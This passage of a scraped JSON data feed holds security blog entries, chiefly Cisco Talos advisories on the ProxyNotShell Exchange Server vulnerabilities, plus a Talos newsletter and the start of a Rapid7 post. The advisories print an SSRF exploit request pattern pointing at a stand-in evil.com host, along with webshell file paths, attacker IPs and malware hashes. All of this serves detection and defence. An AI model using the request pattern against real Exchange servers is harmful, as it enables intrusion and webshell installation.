down the Privacy Policy rabbit hole", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-06T18:00:00", "id": "TALOSBLOG:FB5080C7655BA3C4C2856F34457CBCD0", "href": "https://blog.talosintelligence.com/threat-source-newsletter-oct-6-2022-continuing-down-the-privacy-policy-rabbit-hole/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) vulnerabilities collectively referred to as &quot;ProxyNotShell,&quot; affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://www.microsoft.com/en-us/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/hafnium-update/>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://www.techtarget.com/searchsecurity/news/252502308/Cisco-Talos-Exchange-Server-flaws-accounted-for-35-of-attacks>) last year.\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/&lt;Exchange-backend-endpoint&gt;&amp;Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) an ASP.NET-based webshell and [China Chopper](<https://blog.talosintelligence.com/china-chopper-still-active-9-years-later/>) have been deployed on compromised systems consisting of the following artifacts:\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. \n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using cert util, however, these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.\n\n## Coverage\n\n \nWays our customers can detect and block this threat are listed below.\n\n\n\n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium=web-referral?utm_source=cisco&utm_campaign=amp-free-trial&utm_term=pgm-talos-trial&utm_content=amp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium=web-referral&utm_source=cisco&utm_campaign=cmd-free-trial-request&utm_term=pgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco&#x27;s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium=web-referral?utm_source=cisco&utm_campaign=umbrella-free-trial&utm_term=pgm-talos-trial&utm_content=automated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \n[Cisco Duo](<https://signup.duo.com/?utm_source=talos&utm_medium=referral&utm_campaign=duo-free-trial>) provides multi-factor authentication for users to ensure only those authorized are accessing your network. \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. \n \nIn addition we are releasing SIDs **60637-60641 **to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838 **provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat:\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T21:16:00", "id": "TALOSBLOG:A52D0C18F59637804E33FC802E4F7F00", "href": "https://blog.talosintelligence.com/threat-advisory-microsoft-warns-of-actively-exploited-vulnerabilities-in-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T06:04:38", "description": "## \n\n \nCisco Talos has released new coverage to detect and prevent the exploitation of two recently [disclosed](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) vulnerabilities collectively referred to as \"ProxyNotShell,\" affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3D2022-41040>) is a Server Side Request Forgery (SSRF) vulnerability, while [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2022-41082>) enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers. \n \nWhile no fixes or patches are available yet, Microsoft has [provided mitigations](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The [Hafnium threat actor](<https://blog.talosintelligence.com/2021/03/hafnium-update.html>) exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was [one of the four attacks they saw most often](<https://blog.talosintelligence.com/2022/01/talos-incident-response-year-in-review.html>) last year. \n \n \n\n\n## Vulnerability details and ongoing exploitation\n\n \nExploit requests for these [vulnerabilities](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) look similar to previously discovered ProxyShell exploitation attempts: \n \nautodiscover/autodiscover.json?@evil.com/&lt;Exchange-backend-endpoint&gt;&amp;Email=autodiscover/autodiscover.json%3f@evil.com \n \nSuccessful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. [Open-source reporting](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, [SharPyShell](<https://github.com/antonioCoco/SharPyShell>) an ASP.NET-based webshell and [China Chopper](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) have been deployed on compromised systems consisting of the following artifacts: \n \n\n\n * C:\\inetpub\\wwwroot\\aspnet_client\\Xml.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx\n \n \nThis activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet. \n \nInitial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities. \n \n\n\n## Coverage\n\n \n\n\nWays our customers can detect and block this threat are listed below. \n \n\n\n\n\n \n \n[Cisco Secure Endpoint](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>) (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free [here.](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/free-trial.html?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Damp-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Damp-free-trial>) \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Cisco Secure Email](<https://www.cisco.com/c/en/us/products/security/email-security/index.html>) (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free [here](<https://www.cisco.com/c/en/us/products/security/cloud-mailbox-defense?utm_medium%3Dweb-referral%26utm_source%3Dcisco%26utm_campaign%3Dcmd-free-trial-request%26utm_term%3Dpgm-talos-trial>). \n \n[Cisco Secure Firewall](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>) (formerly Next-Generation Firewall and Firepower NGFW) appliances such as [Threat Defense Virtual](<https://www.cisco.com/c/en/us/products/collateral/security/firepower-ngfw-virtual/datasheet-c78-742858.html>), [Adaptive Security Appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Cisco Secure Malware Analytics](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>) (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. \n \n[Umbrella](<https://umbrella.cisco.com/>), Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella [here](<https://signup.umbrella.com/?utm_medium%3Dweb-referral?utm_source%3Dcisco%26utm_campaign%3Dumbrella-free-trial%26utm_term%3Dpgm-talos-trial%26utm_content%3Dautomated-free-trial>). \n \n[Cisco Secure Web Appliance](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firewall Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \nCisco Talos is releasing SID **60642 **to protect against CVE-2022-41040. \n \nIn addition we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082. \n \nThe existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082. \n \nThe following ClamAV signatures have been released to detect malware artifacts related to this threat: \n \n\n\n * Asp.Backdoor.AntSword-9972727-1\n * Asp.Backdoor.Awen-9972728-0\n * Asp.Backdoor.AntSword-9972729-0\n \n \n\n\n## IOCs\n\n### IPs and URLs\n\n125[.]212[.]220[.]48 \n5[.]180[.]61[.]17 \n47[.]242[.]39[.]92 \n61[.]244[.]94[.]85 \n86[.]48[.]6[.]69 \n86[.]48[.]12[.]64 \n94[.]140[.]8[.]48 \n94[.]140[.]8[.]113 \n103[.]9[.]76[.]208 \n103[.]9[.]76[.]211 \n104[.]244[.]79[.]6 \n112[.]118[.]48[.]186 \n122[.]155[.]174[.]188 \n125[.]212[.]241[.]134 \n185[.]220[.]101[.]182 \n194[.]150[.]167[.]88 \n212[.]119[.]34[.]11 \n137[.]184[.]67[.]33 \n206[.]188[.]196[.]77 \nhxxp://206[.]188[.]196[.]77:8080/themes.aspx", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T21:16:00", "type": "talosblog", "title": "Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T13:40:20", "id": "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "href": "http://blog.talosintelligence.com/2022/09/threat-advisory-exchange-server-vulns.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T19:17:55", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n \n\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nOctober is National Cybersecurity Awareness Month. Which, if you\u2019ve been on social media at all the past 13 days or read any cybersecurity news website, you surely know already. \n\n \n\n\nAs it does every year, I saw Cybersecurity Awareness Month kick off with a [lot of snark](<https://www.washingtonpost.com/politics/2022/10/04/dread-sincerity-comedy-cybersecurity-awareness-month/>) and [memes](<https://twitter.com/NSA_CSDirector/status/1576879730006974464>) of people joking about what it even means to be \u201caware\u201d of cybersecurity and why we even have this month at all. And I get why it\u2019s easy to poke fun at, it is at its core a marketing-driven campaign, and hardcore security experts and researchers have notoriously pushed back against this being a marketing-driven field. \n\n \n\n\nI\u2019m not saying there should be Cybersecurity Awareness Month mascots brought to life on the floor of Black Hat, but it is probably time to pump the brakes on the skepticism and snark. After all, this week should be about broadening the security community, not trying to exclude others from it. I came to Talos almost five years ago at this point knowing little to nothing about security. I had written about everything from ballet dancing to local government ordinances and zoning laws in my previous field, but the second someone mentioned a \u201ccontainer\u201d in relation to computers I could only picture the big metal ones on the decks of freighter boats. The only reason I\u2019ve made it to this point in my career is the support of my employer and co-workers, and their openness to these kinds of conversations. \n\n \n\n\nAnd even five years into the field, I still have so much more to learn. But an easy way for me to digest security is through these high-level conversations, memes, \u201cawareness\u201d stories and \u201cexplain like I\u2019m five\u201d questions. \n\n \n\n\nMy sister-in-law recently had her Instagram account hacked by some bitcoin-mining operation to the point she just had to cut her losses and create a new account. Before that, she didn\u2019t know that enabling multi-factor authentication in Instagram was even an option. Or that because her one password had been compromised on one site meant an attacker might try that same password on another site with an easy-to-guess email address. \n\n \n\n\nMy wife never thought to check the \u201cTo\u201d field of her emails if she thinks the Post Office is actually holding a package from her before realizing the link is from \u201cussps.zone\u201d or something. In those cases, they quite literally are not aware of the security risks in these cases, it\u2019s not that they were willingly ignoring it. \n\n \n\n\nThat\u2019s why I think National Cybersecurity Awareness Month is still important. It\u2019s not for the security practitioners who have been following the same group of 100 people for the past 10 years, it\u2019s for the public who does need to become more aware of the current cybersecurity risks that are out there. It's probably worth putting the jokes aside for a week or two just to take the time to tell someone about why they shouldn\u2019t just click on any link that\u2019s texted to them from a number with the same area code as them. \n\n \n\n\nThat\u2019s how I learned, and that\u2019s how a lot of my colleagues have learned \u2014 just asking questions (some of them that may seem dumb at first). If you want to make it easier to start a conversation with any of your friends and family this October about security, any of the resources on [Cisco\u2019s NCSAM page](<https://www.cisco.com/c/en/us/products/security/national-cybersecurity-awareness-month.html>) are a great place to start. \n\n \n\n\n \n\n\n## The one big thing \n\nMicrosoft [released its monthly security update Tuesday](<https://blog.talosintelligence.com/2022/10/microsoft-patch-tuesday-for-october.html>), disclosing 83 vulnerabilities across the company\u2019s hardware and software line, including seven critical issues in Windows\u2019 point-to-point tunneling protocol. October's security update features 11 critical vulnerabilities, with the remainder being \u201cimportant.\u201d \n\n> ### Why do I care? \n> \n> Many of the critical vulnerabilities included in this month\u2019s security release could lead to remote code execution, which is usually the worst of the worst when it comes to vulnerabilities. One of the most notable vulnerabilities Microsoft fixed this month is [CVE-2022-41038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41038>), a remote code execution issue in Microsoft SharePoint. There are several other SharePoint vulnerabilities included in this month\u2019s Patch Tuesday, though this seems the most severe, as Microsoft continues it to be \u201cmore likely\u201d to be exploited. \n> \n> ### So now what?\n\n> Patch all your Microsoft hardware and software as soon as possible in accordance with the guidance the company provides on its [update page](<https://msrc.microsoft.com/update-guide/>). Talos has also released several Snort rules to protect against the exploitation of many of these vulnerabilities. \n\n> \n\n## Top security headlines from the week\n\n \n\n\nThe Killnet Russian state-sponsored threat actor took credit for several high-profile cyber attacks this week, including the disruption of websites belonging to major American airports and state governments. The group posted on Telegram that it was behind a distributed denial-of-service attack on several airports\u2019 sites, including Los Angeles International, Chicago O'Hare and Hartsfield-Jackson International in Atlanta, some of the largest in the U.S. However, no flight operations were disrupted. Prior to that, they also carried out DDoS attacks against state government-run websites in Colorado, Connecticut, Kentucky and Mississippi, including local election committees. Killnet also took responsibility for disrupting bank JP Morgan\u2019s infrastructure, though the bank denied it experienced any negative effects from the attack. ([NPR](<https://www.npr.org/2022/10/10/1127902795/airport-killnet-cyberattack-hacker-russia>), [SC Magazine](<https://www.scmagazine.com/analysis/cybercrime/amid-reports-of-jp-morgan-cyberattack-experts-call-killnet-unsophisticated-media-hungry>), [StateScoop](<https://statescoop.com/russia-ukraine-killnet-ddos-state-governments/>)) \n\nMicrosoft updated its mitigations for the so-called \u201cProxyNotShell\u201d zero-day vulnerabilities in Exchange Server after security researchers found the initial recommendations could be bypassed. However, there was no formal patch for the issues in this week\u2019s Patch Tuesday as some had expected. An attacker could exploit the flaws to achieve remote code execution on the underlying server. Microsoft also says it's investigating a possibly different vulnerability in Exchange Server that\u2019s being exploited in the wild, though they aren\u2019t ruling out that the new report could be connected to ProxyNotShell. ([The Hacker News](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>), [The Register](<https://www.theregister.com/2022/10/11/october_patch_tuesday/>), [The Record](<https://therecord.media/microsoft-investigating-alleged-exchange-zero-day/>)) \n\nFacebook warned more than a million users that their login credentials could have been stolen if they downloaded one of 400 malicious apps on the Google Play and Apple app stores. The malicious apps disguised themselves as mobile games, photo editing or fitness tracking apps, among others, according to Facebook. Users who may have logged into Facebook through the malicious app could have had their information stolen. Facebook has already notified the users affected, warning them to enable two-factor authentication on their accounts and change their passwords. Forty-seven of the apps existed on the Apple store, while the remainder were Android-based. ([CNET](<https://www.cnet.com/tech/services-and-software/facebook-says-these-400-apps-might-have-stolen-user-logins/>), [Engadget](<https://www.engadget.com/meta-warns-malicious-third-party-apps-apple-google-120049486.html>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #116: The latest on Lockbit 3.0 drama and the rest of the ransomware landscape](<https://www.buzzsprout.com/2018149/episodes/11457844>)_\n * _[Threat Roundup for Sept. 30 to Oct. 7](<https://blog.talosintelligence.com/2022/10/threat-roundup-0930-1007.html>)_\n * _[How ransomware turned into the stuff of nightmares for modern businesses](<https://www.techradar.com/features/how-ransomware-turned-into-the-stuff-of-nightmares-for-modern-businesses>)_\n * _[VMware Patches Code Execution Vulnerability in vCenter Server](<https://www.securityweek.com/vmware-patches-code-execution-vulnerability-vcenter-server>)_\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n \n\n\n**_[GovWare 2022](<https://www.govware.sg/govware/2022/event-info>)_ (Oct. 18 - 20)**\n\nSands Expo &amp; Convention Centre, Singapore \n\n \n\n\n**_[Conference On Applied Machine Learning For Information Security](<https://www.camlis.org/>) _**** (Oct. 20 - 21)**\n\nSands Capital Management, Arlington, Virginia \n\n \n\n\n**_[BSides Lisbon](<https://www.bsideslisbon.org/>)_ (Nov. 10 - 11)**\n\nCidade Universit\u00e1ria, Lisboa, Portugal \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>)** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a ** **\n\n**Typical Filename: **LwssPlayer.scr ** **\n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[1a234656f81e870cdeb0e648a6b305a41452c405cca21124de26b54f79d55ad0](<https://www.virustotal.com/gui/file/1a234656f81e870cdeb0e648a6b305a41452c405cca21124de26b54f79d55ad0/details>) \n\n**MD5: **10f1561457242973e0fed724eec92f8c \n\n**Typical Filename: **ntuser.vbe \n\n**Claimed Product: **N/A** **\n\n**Detection Name: **Auto.1A234656F8.211848.in07.Talos \n\n** \n**\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>)** **\n\n**MD5: **a087b2e6ec57b08c0d0750c60f96a74c\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201 \n\n** \n**\n\n**SHA 256: **[63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f](<https://www.virustotal.com/gui/file/63d543945e33b4b6088dc34d0550213dc73ea6acce248d8353c63039e8fa284f/details>) \n\n**MD5: **a779d230c944ef200bce074407d2b8ff \n\n**Typical Filename: **mediaget.exe** **\n\n**Claimed Product: **MediaGet \n\n**Detection Name: **W32.File.MalParent", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Oct. 13, 2022) \u2014 Cybersecurity Awareness Month is all fun and memes until someone gets hurt", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41038"], "modified": "2022-10-13T18:00:00", "id": "TALOSBLOG:E5CB52FAF6F4E4360A360412C9377097", "href": "http://blog.talosintelligence.com/2022/10/threat-source-newsletter-oct-13-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2022-10-14T19:25:39", "description": "\n\nOn Thursday, September 29, a Vietnamese security firm called GTSC [published information and IOCs](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on what they claimed was a pair of **unpatched** Microsoft Exchange Server vulnerabilities being used in attacks on their customers\u2019 environments dating back to early August 2022. The impact of exploitation, the firm said, is remote code execution. From the information released, both vulnerabilities appeared to be post-authentication flaws. According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior. \n\nMicrosoft [confirmed both zero-day vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) late the evening of September 29, 2022 and said they were aware of \"limited, targeted attacks using the two vulnerabilities to get into users' systems.\" Tracked as CVE-2022-41040 and CVE-2022-41082, neither vulnerability has a patch as of September 30, but Microsoft indicated they're working on an accelerated timeline to release fixes.\n\n * CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability. \n * CVE-2022-41082 allows remote code execution (RCE) when PowerShell is accessible to the attacker.\n\nBoth vulnerabilities require an attacker to have authenticated network access for successful exploitation. The known attacks appear to be a variant of last year's infamous [ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>). **Note: **While attacks using these vulnerabilities have so far chained the two CVEs, it is entirely possible that either could be used alone, or chained with different vulnerabilities.\n\nSecurity researchers have [pointed out](<https://twitter.com/GossiTheDog/status/1575597075118497793>) that there are still plenty of Exchange Server installations not patched or improperly patched for [ProxyShell](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>), which gives attackers an easy way into systems that might otherwise be somewhat more resilient to this latest campaign. As of early September 2022, Rapid7 Labs observed up to **191,000 Exchange Servers exposed to the internet** via port 443. \n\n### Threat intelligence\n\nGTSC's [original blog has extensive details](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on the attacks they observed, including various IOCs, malware analysis, and MITRE ATT&amp;CK mapping. \n\nOn September 30, Microsoft also [published additional 